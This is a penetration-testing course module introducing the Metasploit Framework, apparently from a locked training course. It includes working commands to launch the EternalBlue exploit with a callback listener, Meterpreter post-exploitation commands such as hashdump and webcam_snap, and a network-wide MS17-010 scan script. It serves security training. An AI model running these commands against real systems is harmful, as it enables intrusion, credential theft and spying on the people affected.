Module 3 · Metasploit Framework Basics 🔒

Metasploit Framework (MSF) is the world’s most widely-used exploitation platform. It bundles thousands of exploits, payloads, post-exploitation modules, and auxiliary tools under one console. This module gets you comfortable launching your first authorised exploit and understanding what MSF is doing behind the scenes.

Core concepts

• Exploit — code that takes advantage of a vulnerability
• Payload — what runs after successful exploitation (reverse shell, Meterpreter session, staged shellcode)
• Encoder — transforms payload bytes to evade simple signature detection
• Auxiliary — scanners, fuzzers, DoS tools — things that aren’t exploits but support the workflow
• Post — modules run against an established session (credential harvesting, privilege escalation, persistence)
• Listener / Handler — the attacker-side component awaiting callback from a payload

Launching msfconsole

# Kali / Ubuntu
msfconsole

# Update module database (first run or periodically)
msfupdate

# Inside msfconsole:
search type:exploit name:eternalblue
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 10.0.0.5
set LHOST 10.0.0.100
exploit

Meterpreter — the post-exploit Swiss army

Meterpreter is MSF’s signature payload. It lives entirely in memory (no file on disk), provides a cross-platform command API, and supports extensive post-exploitation:

# After a session is established
meterpreter > sysinfo         # OS info
meterpreter > getuid          # who am I
meterpreter > getprivs        # privileges
meterpreter > hashdump        # dump local SAM hashes
meterpreter > screenshot      # screencap
meterpreter > webcam_snap     # ...
meterpreter > migrate 1234    # move into another process
meterpreter > run post/multi/gather/env

The -r resource script pattern

Repeatable workflows save time. Create a .rc file:

# scan.rc
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 10.0.0.0/24
set THREADS 50
run
exit

# Execute
msfconsole -qr scan.rc